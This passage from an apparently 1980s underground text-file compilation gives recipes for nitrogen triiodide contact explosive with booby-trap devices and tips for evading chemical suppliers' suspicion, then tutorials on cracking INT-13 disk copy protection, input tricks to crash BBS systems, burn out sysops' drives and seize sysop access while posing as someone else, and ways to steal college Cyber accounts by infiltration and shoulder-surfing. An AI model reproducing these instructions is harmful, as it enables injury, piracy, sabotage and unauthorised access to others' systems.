  738. strong tincture of iodine using about 4 ounces or 1/2 measuring cup of rubbing
  739. alcohol, denatured alcohol, or wood alcohol.  Wood alcohol is preferable. Add
  740. iodine crystals and shake thoroughly until no more will dissolve.  Pour the
  741. liquid into a fruit jar. Add the ammonium hydroxide and stir the mixture until
  742. the mixture is a chocolate brown and shows a little of the original color of
  743. the iodine. The amount of ammonia necessary will depend on its strength. An
  744. equal volume of ammonia is usually sufficient for a 15% or higher solution. The
  745. solution should be filtered at once, and shouldn't ever wait more than 10 or 15
  746. minutes, because it starts to dissolve again.
  747.  
  748. The explosive again should be stored and applied while wet. This material is
  749. chemically the same as the granular explosive, but because it was precipitated
  750. from a solution, it is much more finely divided, and the reaction happens
  751. almost simultaneously, so you can get it out before it all vanishes back into
  752. the solution.
  753.  
  754. 3.) Paint type #2. Dissolve 1 gram of potassium iodide in about 90cc of
  755. 18%-22% ammonium hydroxide. Add 4 grams of pulverized iodine. A deep black
  756. sediment should start forming. Let stand, and stir frequently for five minutes.
  757. Then, filter as usual. While the potassium iodide is not an integral part of
  758. the chemical reaction, the dissolved potassium iodide will allow the iodine
  759. crystals in turn to dissolve, and its common ion effect will cause less iodine
  760. crystals to be wasted. Since the iodine is by far the most expensive
  761. ingredient, you'll save money in the long run by using it.
  762.  
  763.                        Care in Handling And Storage  ∩7Å3 è
  764. Because this material is so unstable it deteriorates quickly. Don't make any
  765. more than you need to use in the next 24 hours. If you can't use it all
  766. immediately, the container you keep it in should be recapped tightly after use
  767. and the mouth wiped clean. The explosive can cause dark stain damage to things
  768. as rugs, clothing, chair seats, wallpaper, and light or clear plastics. A
  769. strong solution of sodium thiosulfate is effective for removing stains from
  770. hands and clothing before they set. Never leave the container of explosive in
  771. direct sunlight for more than a few minutes, as it will weaken the strength. Do
  772. NOT attempt to make a large explosion as it is dangerous and can cause
  773. deafness.  All equipment used should be thoroughly washed and the used filter
  774. paper flushed down the toilet. Under no circumstances attempt to handle the
  775. dried material which is extremely explosive and hazardous. If you can avoid
  776. storing the material in a container at all, there will be no chance that a
  777. loose stopper will let the material dry out and become a potential bomb. Tiny
  778. bits of this can be great fun, but it has to be handled with care.
  779.  
  780.                                  Application
  781.  
  782. Although largely a scientific curiosity, this explosive finds itself well
  783. suited for practical jokes. It may easily be painted on the bottom side of
  784. light switches, sprinkled on floors, painted in keyholes, pencil sharpeners,
  785. doorknobs and in hundreds of other unsuspected places. It is also ideal for
  786. catching locker thieves and desk prowlers. It will leave a dark stain on his
  787. hands when it explodes, and only you will know how to remove it.
  788.  
  789.                               Reaction Equations
  790.  
  791.                                     Ammonium
  792.           Ammonium      Ammonium    Nitrogen
  793. Iodine   Hydroxide       Iodide    Tri Iodide  Water
  794.  
  795. 3I     +   5NH OH   ---> 3NH I  +   NH NI    +  5H O
  796.   2           4             4         3  3        2
  797.  
  798. The theoretical yield of explosive from pure iodine is 54.1% by weight. The
  799. remainder of the iodine may be recovered for reuse from the ammonium iodide
  800. waste product by evaporating the waste liquid and treating with chlorine if a
  801. chemistry lab is available. The contact explosive is Ammonium Nitrogen
  802. Tri-Iodide, which explodes into iodine, nitrogen, and ammonia.
  803.  
  804.  Ammonium
  805.  Nitrigen
  806. Tri-Iodide     Iodine  Nitrogen Ammonia
  807.  
  808. 2NH NI    --->  3I   +    N    +  2NH
  809.    3  3           2        2         3
  810.  
  811.                       Some Clever Uses For This Material
  812.  
  813. 1.) Contact Explosive Torpedos. Get some gelatin capsules, the kind pills are
  814. made of. Fill the small half with uncooked dry tapioca until it is half full.
  815. Then place a wet blob of contact explosive about 4 times the size of a straight
  816. pin head on top of it. Either the granular or paint type explosive will work.
  817. The capsule is then filled the rest of the way up with tapioca until, when the  ∩7Å3 ècapsule is put together, the grains of tapioca are packed tightly, and none are
  818. loose. If this is not done properly, the torpedos could go off prematurely, and
  819. the joke would be on you. The torpedos are then moistened at the joints to seal
  820. them and stored until the next day. They are not sensitive enough until the
  821. next day and too sensitive the day after, so plan your activities accordingly.
  822. These torpedos are the most fiendish devices made. You can lay one on top of a
  823. door, where it will roll off when the door is opened, and it will explode on
  824. contact with the floor. If you toss one some distance away it will appear as if
  825. someone else was responsible for the explosion. These torpedos are ideal as
  826. booby traps or for pulling practical jokes with. They may be carried in a small
  827. box filled with cotton until needed. Just treat the box gently, and all will be
  828. well.
  829.  
  830. 2.Contact Explosive Booby Traps. Prepare a small amount of contact explosive.
  831. Cut strips of newspaper 1 1/2 inches wide and 1 foot long. Cut a piece of
  832. string 1 foot long. Put a small amount of wet contact explosive on the strip of
  833. paper 1 inch from the end. Double the string. Now pull one end of the string
  834. back until there is a double loop in the string about 1 inch long. Do not tie.
  835. Lay this double loop across the wet contact explosive and tightly roll the
  836. paper and glue the end. Put away for a few days until thoroughly dry. When dry,
  837. pull the ends of the string and the booby trap will explode. The strings, when
  838. pulled, rub against the dry contact explosive, and make it explode.
  839.  
  840.  
  841.                            Getting The Materials
  842.  
  843. There are quite a few chemical supply houses that you can mail order the
  844. materials you need. You'll have to sign a form stating that you're over 21 and
  845. won't use the chemicals for the types of things we're learning here. Note that
  846. the people who run these supply houses know what Iodine Crystals and Ammonium
  847. Hydroxide can do when mixed together, and if you order both from the same
  848. place, or in the same order, it may arouse some suspicion.
  849.  
  850. Check the classified ads in the back of magazines like Popular Science for the
  851. current supply houses. Order as many catalogs as you can find. Not all sell
  852. every chemical that you may want for this series. Also, you can break the
  853. orders up so as not to look suspicious. Lastly, some houses are used to selling
  854. to individuals, and will provide chemicals in 1 or 4 ounce lots, while others
  855. prefer to sell to large institutions, and sell their wares in 1 or 5 pound
  856. jugs. Split up your orders according to the quantities of each item you think
  857. you will be needing. An ounce of Iodine Crystals will cost three or four
  858. dollars an ounce, and an ounce bottle of iodine is pretty tiny, but it goes a
  859. long way. If you had to buy that by the pound, you might just want to forget
  860. the whole thing.
  861.  
  862.  
  863.  
  864.                     ****************************************
  865.                     *                                      *
  866.                     *        Cracking On the IBMpc         *
  867.                     *               Part I                 *
  868.                     *                                      *
  869.                     ****************************************
  870.  
  871. Introduction  ∩7Å3 è------------
  872.   For years, I have seen cracking tutorials for the APPLE computers, but never
  873. have I seen one for the PC.  I have decided to try to write this series to help
  874. that pirate move up a level to a crackest.
  875.  
  876.   In this part, I will cover what happens with INT 13 and how most copy
  877. protection schemes will use it.  I strongly suggest a knowledge of Assembly
  878. (M/L) and how to use DEBUG.  These will be an important figure in cracking
  879. anything.
  880.  
  881. INT-13 - An overview
  882. --------------------
  883.   Many copy protection schemes use the disk interrupt (INT-13).  INT-13 is
  884. often use to either try to read in a illegaly formatted track/sector or to
  885. write/format a track/sector that has been damaged in some way.  INT-13 is
  886. called like any normal interrupt with the assembler command INT 13 (CD 13).
  887. [AH] is used to select which command to be used, with most of the other
  888. registers used for data.
  889.  
  890. INT-13 Cracking Collage
  891. -----------------------
  892.   Although, INT-13 is used in almost all protection schemes, the easiest to
  893. crack is the DOS file.  Now the protected program might use INT-13 to load some
  894. other data from a normal track/sector on a disk, so it is important to
  895. determine which tracks/sectors are important to the protection scheme.  I have
  896. found the best way to do this is to use LOCKSMITH/pc (what, you don't have LS.
  897. Contact your local pirate for it.) Use LS to analyze the diskette.  Write down
  898. any track/sector that seems abnormal.  These track are must likely are part of
  899. the protection routine.  Now, we must enter debug. Load in the file execute a
  900. search for CD 13.  Record any address show.  If no address are picked up, this
  901. mean 1 or 2 things, the program is not copy protected (bullshit) or that the
  902. check is in an other part of the program not yet loaded.  The latter
  903. being a real bitch to find, so I'll cover it in part II.  There is another
  904. choice.  The CD 13 might be hidden in self changing code.  Here is what a
  905. sector of hidden code might look like
  906.  
  907. -U CS:0000
  908. 1B00:0000 31DB     XOR    BX,BX
  909. 1B00:0002 8EDB     MOV    DS,BX
  910. 1B00:0004 BB0D00   MOV    BX,000D
  911. 1B00:0007 8A07     MOV    AL,[BX]
  912. 1B00:0009 3412     XOR    AL,12
  913. 1B00:000B 8807     MOV    [BX],AL
  914. 1B00:000D DF13            FIST   WORD...
  915.  
  916.   In this section of code, [AL] is set to DF at location 1B00:0007.  When you
  917. XOR DF and 12, you would get a CD(hex) for the INT opcode which is placed right
  918. next to a 13 ie, giving you CD13 or INT- 13.  This type of code can't and will
  919. not be found using debug's [S]earch command.
  920.  
  921. Finding Hidden INT-13s
  922. ----------------------
  923.   The way I find best to find hidden INT-13s, is to use a program called PC-
  924. WATCH (TRAP13 works well also).  This program traps the interrupts and will
  925. print where they were called from.  Once running this, you can just disassemble  ∩7Å3 èaround the address until you find code that look like it is setting up the disk
  926. interrupt.
  927.   An other way to decode the INT-13 is to use debug's [G]o command.  Just set a
  928. breakdown at the address give by PC-WATCH (both programs give the return
  929. address).  Ie, -G CS:000F (see code above).  When debug stops, you will have
  930. encoded not only the INT-13 but anything else leading up to it.
  931.  
  932. What to do once you find INT-13
  933. -------------------------------
  934.   Once you find the INT-13, the hard part for the most part is over.  All that
  935. is left to do is to fool the computer in to thinking the protection has been
  936. found.  To find out what the computer is looking for, examine the code right
  937. after the INT-13.  Look for any branches having to do with the CARRY FLAG or
  938. any CMP to the AH register.  If a JNE or JC (etc) occurs, then [U]nassembe the
  939. address listed with the jump.  If it is a CMP then just read on.  Here you must
  940. decide if the program was looking for a protected track or just a normal track.
  941. If it has a CMP AH,0 and it has read in a protected track, it can be assumed
  942. that it was looking to see if the program had successfully complete the
  943. READ/FORMAT of that track and that the disk had been copied thus JMPing back to
  944. DOS (usually).  If this is the case, Just NOP the bytes for the CMP and the
  945. corresponding JMP.  If the program just checked for the carry flag to be set,
  946. and it isn't, then the program usually assumes that the disk has been copied.
  947. Examine the following code
  948.  
  949.       INT 13      <-- Read in the Sector
  950.       JC 1B00     <-- Protection found
  951.       INT 19      <-- Reboot
  952. 1B00  (rest of program)
  953.  
  954.   The program carries out the INT and find an error (the illegaly formatted
  955. sector) so the carry flag is set.  The computer, at the next instruction, see
  956. that the carry flag is set and know that the protection has not been breached.
  957. In this case, to fool the computer, just change the "JC 1B00" to a "JMP 1B00"
  958. thus defeating the protection scheme.
  959.  
  960.  
  961. NOTE: the PROTECTION ROUTINE might be found in more than just 1 part of the
  962.      program
  963.  
  964. Handling EXE files
  965. ------------------
  966.   As we all know, Debug can read .EXE files but cannot write them.  To get
  967. around this, load and go about cracking the program as usual.  When the
  968. protection scheme has been found and tested, record (use the debug [D]ump
  969. command) to save + & - 10 bytes of the code around the INT 13.  Exit back to
  970. dos and rename the file to a .ZAP (any extension but .EXE will do) and
  971. reloading with debug.  Search the program for the 20+ bytes surrounding the
  972. code and record the address found.  Then just load this section and edit it
  973. like normal.  Save the file and exit back to dos.  Rename it back to the .EXE
  974. file and it should be cracked.  ***NOTE: Sometimes you have to fuck around for
  975. a while to make it work.
  976.  
  977. DISK I/O (INT-13)
  978. -----------------
  979.   This interrupt uses the AH resister to select the function to be used.  Here  ∩7Å3 èis a chart describing the interrupt.
  980.  
  981. AH=0    Reset Disk
  982. AH=1    Read the Status of the Disk
  983.         system in to AL
  984.  
  985.     AL          Error
  986.   ----------------------------
  987.     00   - Successful
  988.     01   - Bad command given to INT
  989.    *02   - Address mark not found
  990.     03   - write attempted on write prot
  991.    *04   - request sector not found
  992.     08   - DMA overrun
  993.     09   - attempt to cross DMA boundary
  994.    *10   - bad CRC on disk read
  995.     20   - controller has failed
  996.     40   - seek operation failed
  997.     80   - attachment failed
  998. (* denotes most used in copy protection)
  999. AH=2    Read Sectors
  1000.  
  1001.   input
  1002.      DL = Drive number (0-3)
  1003.      DH = Head number (0or1)
  1004.      CH = Track number
  1005.      CL = Sector number
  1006.      AL = # of sectors to read
  1007.   ES:BX = load address
  1008.   output
  1009.       AH =error number (see above)
  1010.           [Carry Flag Set]
  1011.       AL = # of sectors read
  1012.  
  1013. AH=3 Write (params. as above)
  1014. AH=4 Verify (params. as above -ES:BX)
  1015. AH=5 Format (params. as above -CL,AL
  1016.              ES:BX points to format
  1017.              Table)
  1018.  
  1019.   For more information on INT-13 see the IBM Technical Reference Manuals.
  1020.  
  1021. Coming Soon
  1022. ------------
  1023.   In part II, I will cover CALLs to INT-13 and INT-13 that is located in
  1024. different overlays of the program
  1025.  
  1026.  
  1027.  
  1028.   ***************************************************************************
  1029.   *                                                                         *
  1030.   *                          Cracking On the IBMpc                          *
  1031.   *                                 Part  II                                *
  1032.   *                                                                         *
  1033.   ***************************************************************************  ∩7Å3 è
  1034. Introduction
  1035. ------------
  1036.  
  1037.   Ok guys, you now passed out of Kopy Klass 101 (dos files) and have this great
  1038. new game with overlays.  How the phuck do I crack this bitch.  You scanned the
  1039. entire .EXE file for the CD 13 and it's nowhere.  Where can it be you ask
  1040. yourself.
  1041.   In part II, I'll cover cracking Overlays and the use of locksmith in
  1042. cracking.  If you haven't read part I, then I suggest you do so.  The 2 files
  1043. go together.
  1044.  
  1045.  
  1046. Looking for Overlays
  1047. --------------------
  1048.   So, you cant find CD 13 in the .EXE file, well, it can mean 4 things.  1, the
  1049. .EXE (though it is mostly .COM) file is just a loader for the main file. 2, the
  1050. .EXE file loads in an overlay.  3, the CD 13 is encrypted &/or hidden in the
  1051. .EXE file. 4,
  1052.  your looking at the WRONG PHUCKEN PHILE.
  1053.   I won't discuss case 1 (or at least no here) because so many UNP files are
  1054. devoted to PROLOCK and SOFTGUARD, if you can't figure it out with them, your
  1055. PHUCKEN stupid.
  1056.   If you have case 3, use the technique in part I and restart from the beg. And
  1057. if you have case 4, shoot your self.
  1058.   You know the program uses overlays but don't see and on disk?  Try looking at
  1059. the disk with good old nortons.  Any hidden files are probably the overlays.
  1060. These are the ones we are after.  If you still can't find them, use PC-WATCH
  1061. (this program is a must!!! for all crackists.  Traps ALL interrupts).
  1062.  
  1063.  
  1064. Using PC-Watch to Find Overlays
  1065. -------------------------------
  1066.   Start up PC-Watch and EXCLUDE everything in the left col.  Search the right
  1067. col. until you find DOS21 - OpnFile and select it.  Now run the program to be
  1068. cracked.  Play the game until the protection is checked.  Examine you pcwatch
  1069. output to see what file was loaded right before it.  This probably is the one
  1070. holding the check.  If not, shit go through all the files.
  1071.  
  1072.  
  1073. You Have Found the Overlays
  1074. ---------------------------
  1075.   Great, now just crack the overlay as if it was a DOS file.  You don't need to
  1076. worry about .EXE file, debug can write an overlay file.  Part I explains the
  1077. basics of cracking.  I suggest that you keep a backup copy of the overlay so if
  1078. you phuck up, and you will, you can recover quickly. Ah, and you thought
  1079. cracking with overlays was going to be hard.
  1080.  
  1081.  
  1082. Locksmith and Cracking
  1083. ----------------------
  1084.  The copy/disk utility program Locksmith by AlphaLogic is a great tool in
  1085. cracking.  It's analyzing ability is great for determining what and where the
  1086. protection is.
  1087.  I find it useful, before I even start cracking, to analyze the protected disk
  1088. to find and id it's protection.  This helps in 2 ways.  First, it helps you to
  1089. know what to do in order to fake out the protection.  Second, it helps you to
  1090. find what the program is looking for.  ∩7Å3 è I suggest that you get lomith if you don't already have it.  Check your
  1091. local pirate board for the program.  I also suggest getting PC-Watch and Norton
  1092. Utilities 3.1.  All of these program have many uses in the cracking world.
  1093.  
  1094.  
  1095.  
  1096.                          How To Crash a Commadore BBS
  1097.  
  1098. Part One - How to crash a RAVICS BBS
  1099.  
  1100.   Try to chat with the sysop. If it starts to say "Attemp #1" and so on, then
  1101. just hit 'C' >VERY< fast a few hundred times. After it pages the sysop about
  1102. 30 times it will give an out of memory error in such and such a line.
  1103.  
  1104. Part Two - How to crash an IIBBS
  1105.  
  1106.   This will only work if the sysop is running either an un-modified version
  1107. of IIBBS, or he has the very first version. Log on as a new user. Log off
  1108. and then log on again as a new user.  Then log off and try to log on again
  1109. as the SECOND new user you logged in as. In the old version, the BBS dosn't
  1110. initialize the drive after writing to the relative file. Therefore, when you
  1111. try to log in as the second new user, it will try to read past the bad
  1112. position but will never find it. This will leave his drive spinning until
  1113. he can come in and reset the system. If it dosn't work the first time try
  1114. again with two more new users, and so on. The system will just sit there
  1115. sending a carrier to you. When the drive is left spinning it will heat up the
  1116. metal frame in inside of the 1541 drive. This will cause the readwwrite head
  1117. to be knocked out of alignment, costing the sysop a mere $45...
  1118.  
  1119. Part 3 - How to crash a 64 Exchange
  1120.  
  1121.   Go into the download section and start to download a file. When it is ready
  1122. to send (it should say 'A to abort, B to change block size. Ready to send')
  1123. then select B and enter '99e99' when  it asks for the new block size (99e99 is
  1124. a number bigger than the computer can accept). This will only work on older
  1125. versions of 64 Exchange.
  1126.  
  1127.  
  1128. Part One - Another Way to Crash IIBBS
  1129.  
  1130.   Log on and enter the message base. At the prompt enter '99e99'. This will
  1131. cause an overflow error. If the sysop has a crash handling routine, then
  1132. use the method in How to Crash C64 BBS's - I and fry his drive. Here is
  1133. another way. If you log in and it says 'You have mail' or whatever, but it
  1134. dosn't list who it's from and the date, then go into the e-mail section.
  1135. Proceed to read your mail.  It should say 'No mail found' or whatever. At the
  1136. prompt, enter 'R' for reply or 'D' for delete. It will delete your mail and
  1137. cause an Illegal quantity error.
  1138.  
  1139. Part Two - How to Crash a RAVICS V9.3
  1140.  
  1141.   Log on as a new user. When it say it's creating your ID hit a bunch of keys.
  1142. This will lock up the program and leave his drive spinning.
  1143.  
  1144. Part Three - How to Crash Hal BBS 4.6  ∩7Å3 è
  1145.   Enter 255 for your ID # and 'HAL' for the password. If the sysop has the
  1146. BASIC version this won't work. But if it does you will now be in the sysop
  1147. menu. Have fun...
  1148.  
  1149. Part Four - How to Crash Ace Line 3.5
  1150.  
  1151.   Log on and check to see if they are running the version modified by General
  1152. Zod (it should have his name all over it). If it is just call back about 10
  1153. times. Sooner or later it will cause an Out of Memory error.
  1154.  
  1155.  
  1156.                           How to crash GBBS ][ boards
  1157.  
  1158.       We all have that one local board around you that you would really
  1159. like to crash! Maybe the sysop did something really bad to you or
  1160. something in that nature! Boy he sure would get Mad when he wakes up with
  1161. both drives burned out, user file is messed up or something like that!
  1162.  
  1163.       One thing to remember is when you call the board to crash it, I'd
  1164. use a phoney allias name (even another person you want to get revenge
  1165. on too!) because they will really get mad about crashing thier board and
  1166. will really kick some ass when they find out who did it. Just a warning!
  1167.  
  1168. 1> Lets say the sysops name to the GBBS board is "Butch Jr.". Call the
  1169. place up and when it asks for your last name, type "Jr.". When it asks
  1170. for your password, type in what ever you have to type for a new user.
  1171. Then it should ask for your first name. Just type " Butch" (1 space
  1172. infront of name). This will automaticly put you into sysop command
  1173. level and you will be able to delete messages, users, exit the GBBS
  1174. program and initalize the disks and ect.....Just about anything your
  1175. little heart wants to do! Modify the board and delete the sysop too!
  1176. This way for crashing also works when you type in for last name:" Jr."
  1177. and first name "Butch". It should do the same thing. The one major
  1178. drawback to this way of crashing is that most GBBS boards have thier
  1179. oards modified to that you can't do this. They will have it either
  1180. hang up after you type it in, Display a nasty message for you, or
  1181. just ask for the last name again. Oh well! No body is perfect!
  1182.  
  1183. 2> Call the board up and log on as a new user. When it asks for the
  1184. city/state you live in, type in a few commas like this:
  1185.        "Tampa,,,,,,,,,,Fla" or ",,,,,,,,,,,,,,,,,,," will do!
  1186. You just have to have more than 2 or 3 commas to do the job right.
  1187. This way should kill the passwords on the user file! <ool!!
  1188.  
  1189. 3> When you leave a message up on the board, save it, and then it says
  1190. "Wait" for about 10 seconds. Vry this one: Leave a message on the board
  1191. and save it and when it says "Wait", Just do a little "esc-h"
  1192. (to hang up in Ascii Express). That way should be writting the message
  1193. and when it looses the carrier, it will be off the hook for the night!
  1194. You can hang up on either "Wait" (after saving message an` after you
  1195. abort into the main command board.
  1196.  
  1197. 4> When the GBBS asks for a number like board number or something like
  1198. that, type in "99E99". This creats and error on the board and might put  ∩7Å3 èyou in sysop command level depending on what serial number the GBBS
  1199. program is. It will do some other things too.
  1200.  
  1201. 5> When you log on and it asks for your password, type in a negative
  1202. number like "G-99FFF" or "A-01AAA" or some negative number kinda like
  1203. that. This should also create an error and might even put you in sysop
  1204. command level (you can do anything from there! Believe me!) But
  1205. like I said before, Depending on what type of serial number the program
  1206. is.
  1207.  
  1208. 6> Log on as a new user and when it's reading the new user welcome or
  1209. just any text file, type "Cntl-s Cntl-p :" and that should make a fatal
  1210. error on his part and put you proptly into basic or machine language
  1211. with dos loaded and you can work from there!
  1212.  
  1213. 7> New user reading welcome message and type "Cntl-s Cntl-p *" and
  1214. that will bomb the board out also.
  1215.  
  1216. 8> New user reading welcome message and type "Cntl-s Cntl-p" and start
  1217. pounding on the keyboard! That sould fill the buffer up and make a
  1218. fatal error and put you into machine language or basic. Work from there!
  1219.  
  1220. 9> New user reading welcome message and type "Cntl-s" and hold repeat
  1221. and "Cntl-p" down and that will also bomb the buffer too and put
  1222. you into machine or basic language.
  1223.  
  1224.  
  1225.                     Hacking Control Data Corporation's Cyber
  1226.  
  1227.   This article will cover getting into and using NOS (Networking
  1228. Operating System) version 2.5.2 running on a Cyber 730 computer.  Cybers
  1229. generally run this operating system so I will just refer to this environment as
  1230. Cyber.  Also, Cyber is a slow and outdated operating system that is primarily
  1231. used only for college campuses for running compilers.  First off after you have
  1232. scanned a bunch of carriers you will need to know how Cyber identifies itself.
  1233. It goes like this:
  1234.  
  1235. WELCOME TO THE NOS SOFTWARE SYSTEM.
  1236. COPYRIGHT CONTROL DATA 1978, 1987.
  1237.  
  1238. 88/02/16. 02.36.53. N265100
  1239. CSUS CYBER 170-730.                     NOS 2.5.2-678/3.
  1240. FAMILY:
  1241.  
  1242.   You would normally just hit return at the family prompt.  Next prompt is:
  1243.  
  1244. USER NAME:
  1245.  
  1246.   User names are in the format  abcdxxx  where a is the location of where
  1247. the account is being used from (A-Z).  the b is a grouping specifying
  1248. privileges and limits for the account- usually A-G -where A is the lowest
  1249. access.  Some examples of how they would be used in a college system:
  1250.    A = lowest access - class accounts for students
  1251.    B = slightly higher than A (for students working on large projects)
  1252.    C = Much higher limits, these accounts are usually not too hard to get  ∩7Å3 è       and they will normally last a long time!  Lab assistants use these.
  1253.    D = Instructors, Lecturers, Professors.. etc..
  1254.    E = same... (very hard to get these!)
  1255.  
  1256.   The C and D positions are usually constant according to the groupings.
  1257.   For example, a class would have accounts ranging from NADRAAA-AZZ
  1258.                                                           ^^^ ^^^
  1259.                                                  These can also be digits
  1260.  
  1261.   There are also special operator accounts which start with digits instead
  1262. of numbers. (ie 7ETPDOC)  These accounts can run programs such as the
  1263. monitor which can observe any tty connected to the system...
  1264.  
  1265.   The next prompt will be for the password, student account passwords cannot
  1266. be changed and are 7 random letters by default, other account passwords
  1267. can be changed.  You get 3 tries until you are logged out.  It is very
  1268. difficult if not impossible to use a brute force hacker or try to guess
  1269. someones account.. so how do you get on?  Here's one easy way...
  1270. Go down to your local college (make sure they have a cyber computer!)
  1271. then just buy a class catalog (they only cost around 50 cents) or you
  1272. could look, borrow, steal someone else's... then find a pascal or fortran
  1273. class that fits your schedule!  You will only have to attend the class
  1274. 3 or 4 times max.  Once you get there you should have no trouble, but
  1275. if the instructor asks you questions about why you are not on the roll,
  1276. just tell him that you are auditing the class (taking it without enrolling
  1277. so it won't affect your GPA).  The instructor will usually pass out
  1278. accounts on the 3rd or 4th day of class.. this method also works well
  1279. with just about any system they have on campus!  Another way to get
  1280. accounts is to go down to the computer lab and start snooping!  Look
  1281. over someones shoulder while they type in their password, or look thru
  1282. someones papers while they're in the bathroom, or look thru the assistants
  1283. desk while he is helping someone... (I have acquired accounts both ways,
  1284. and the first way is a lot easier with less hassles)  Also, you can use
  1285. commas instead of returns when entering user name and password.
  1286. Example:  at the family prompt, you could type  ,nadrajf,dsfgkcd
  1287.                      or at the user name prompt   nadrajf,dsfgkcd
  1288.  
  1289.   After you enter your info, the system will respond with:
  1290.  
  1291. JSN: APXV, NAMIAF
  1292. /
  1293.  
  1294.   The 'APXV, NAMIAF' could be different depending on what job you were
  1295. attached to.  The help program looks a lot neat if you have vt100
  1296. emulation, if you do, type [screen,vt100] (don't type the brackets! from
  1297. now on, all commands I refer to will be enclosed in brackets)
  1298. Then type help for an extensive tutorial or a list of commands.
  1299. Your best bet at this point is to buy a quick reference guide at the
  1300. campus because I am only going to describe the most useful commands.
  1301. The / means you are in the batch subsystem, there are usually 6 or 7
  1302. other subsystems like basic, fortran, etc... return to batch mode by
  1303. typing [batch].
  1304.  
  1305. Some useful commands:
  1306.   ∩7Å3 è   CATLIST    -  will show permanent files in your directory.
  1307.    ENQUIRE,F  -  displays temporary files in your workspace.
  1308.    LIMITS     -  displays your privileges.
  1309.    INFO       -  get more online help.
  1310.    R          -  re-execute last command.
  1311.    GET,fn     -  loads fn into the local file area.
  1312.    CHANGE     -  certain specs on a file.
  1313.    PERMIT     -  allow other users to use one of your files.
  1314.    REWIND,*   -  rewinds all your local files.
  1315.    NEW,fn     -  creates new file.
  1316.    PURGE      -  deletes files.
  1317.    LIST,F=fn  -  list file.
  1318.    UPROC      -  create an auto-execute procedure file.
  1319.    MAIL       -  send/receive private mail.
  1320.    BYE        -  logoff.
  1321.  
  1322.   Use the [helpme,cmd] command for the exact syntax and parameters of these
  1323. commands.  There are also several machine specific 'application' programs
  1324. such as pascal, fortran, spitbol, millions of others that you can look
  1325. up with the INFO command... there are also the text editors; edit, xedit,
  1326. and fse (full screen editor).  Xedit is the easiest to use if you are
  1327. not at a Telray 1061 terminal and it has full documentation.  Simply
  1328. type [xedit,fn] to edit the file 'fn'.
  1329.  
  1330.   Special control characters used with Cyber:
  1331.  
  1332.   Control S and Control Q work normally, the terminate character is
  1333. Control T followed by a carriage return.  If you wanted to break out of
  1334. an auto-execute login program, you would have to hit ^T C/R very fast
  1335. and repetitively in order to break into the batch subsystem.  Control Z
  1336. is used to set environment variables and execute special low level
  1337. commands, example: [^Z TM C/R] this will terminate your connection...
  1338.  
  1339.   So now you're thinking, what the hell is Cyber good for?  Well, they
  1340. won't have any phone company records, and you can't get credit information
  1341. from one, and I am not going to tell you how to crash it since crashing
  1342. systems is a sin.  There are uses for a cyber though,  one handy use is
  1343. to set up a chat system, as there are normally 30-40 lines going into
  1344. a large university cyber system.  I have the source for a chat program
  1345. called the communicator that I will be releasing soon.  Another use is
  1346. some kind of underground information exchange that people frequently
  1347. set up on other systems, this can easily be done with Cyber.
  1348.  
  1349. Procedure files:
  1350.  
  1351.   A procedure file is similiar to a batch file for MS-DOS, and a shell
  1352. script for UNIX.  You can make a procedure file auto-execute by using
  1353. the UPROC command like [uproc,auto] will make the file 'auto', auto
  1354. execute.  There is also a special procedure file called the procfile in
  1355. which any procedure may be accessed by simply a - in front of it.  If your
  1356. procfile read:
  1357.  
  1358. .proc,cn.
  1359. .*  sample procedure
  1360. $catlist/un=7etpdoc.
  1361. $exit.
  1362.   ∩7Å3 è  Then you could simply type -cn and the / prompt and it would cute
  1363. the catlist command.  Now back to uprocs,  you could easily write a whole
  1364. BBS in a procedure file or say you wanted to run a chat system and you
  1365. did not want people to change the password on your account, you could
  1366. do this:
  1367.  
  1368. .proc,chat,
  1369. PW"Password: "=(*A).
  1370. $ife,PW="cyber",yes.
  1371.    $chat.
  1372.    $revert.
  1373.    $bye.
  1374. $else,yes.
  1375.    $note./Wrong password, try again/.
  1376.    $revert.
  1377.    $bye.
  1378. $endif,yes.
  1379.  
  1380.   This procedure will ask the user for a password and if he doesn't type
  1381. "cyber" he will be logged off.  If he does get it right then he will be
  1382. dumped into the chat program and as soon as he exits the chat program,
  1383. he will be logged off.  This way, the user cannot get into the batch
  1384. subsystem and change your password or otherwise screw around with the
  1385. account.  The following is a listing of the procfil that I use on my
  1386. local system, it has a lot of handy utilities and examples...
  1387.  
  1388.  
  1389. .PROC,B.
  1390. .******BYE******
  1391. $DAYFILE.
  1392. $NOTE.//////////////////////////
  1393. $ASCII.
  1394. $BYE.
  1395. $REVERT,NOLIST.
  1396. #EOR
  1397. .PROC,TIME.
  1398. .******GIVES DAY AND TIME******
  1399. $NOTE./THE CURRENT DAY AND TIME IS/
  1400. $FIND,CLOCK./
  1401. $REVERT,NOLIST.
  1402. #EOR
  1403. .PROC,SIGN*I,IN.
  1404. .******SIGN PRINT UTILITY******.
  1405. $GET,IN.
  1406. $FIND,SIGN,#I=IN,#L=OUT.
  1407. $NOTE./TO PRINT, TYPE:   PRINT,OUT,CC,RPS=??/
  1408. $REVERT,NOLIST.
  1409. #EOR
  1410. .PROC,TA.
  1411. .******TALK******
  1412. $SACFIND,AID,COMM.
  1413. $REVERT,NOLIST.
  1414. #EOR
  1415. .PROC,DIR,UN=,FILE=.
  1416. .******DIRECTORY LISTING OF PERMANENT FILES******
  1417. $GET(ZZZZDIR=CAT/#UN=1GTL0CL)
  1418. ZZZZDIR(FILE,#UN=UN)
  1419. $RETURN(ZZZZDIR)
  1420. $REVERT,NOLIST.
  1421. #EOR
  1422. .PROC,Z19.
  1423. .******SET SCREEN TO Z19******
  1424. $SCREEN,Z19.
  1425. $NOTE./SCREEN,Z19.
  1426. $REVERT,NOLIST.
  1427. #EOR
  1428. .PROC,VT.
  1429. .******SET SCREEN TO VT100******
  1430. $SCREEN,VT100.
  1431. $NOTE./SCREEN,VT100.  ∩7Å3 è$REVERT,NOLIST
  1432. #EOR
  1433. .PROC,SC.
  1434. .******SET SCREEN TO T10******
  1435. $SCREEN,T10.
  1436. $NOTE./SCREEN,T10.
  1437. $REVERT,NOLIST
  1438. #EOR
  1439. .PROC,C.
  1440. .******CATLIST******
  1441. $CATLIST.
  1442. $REVERT,NOLIST.
  1443. #EOR
  1444. .PROC,CA.
  1445. .******CATLIST,LO=F******
  1446. $CATLIST,LO=F.
  1447. $REVERT,NOLIST.
  1448. #EOR
  1449. .PROC,MT.
  1450. .******BBS******
  1451. $SACFIND,AID,MTAB.
  1452. $REVERT,NOLIST.
  1453. #EOR
  1454. .PROC,LI,FILE=.
  1455. .******LIST FILE******
  1456. $GET,FILE.
  1457. $ASCII.
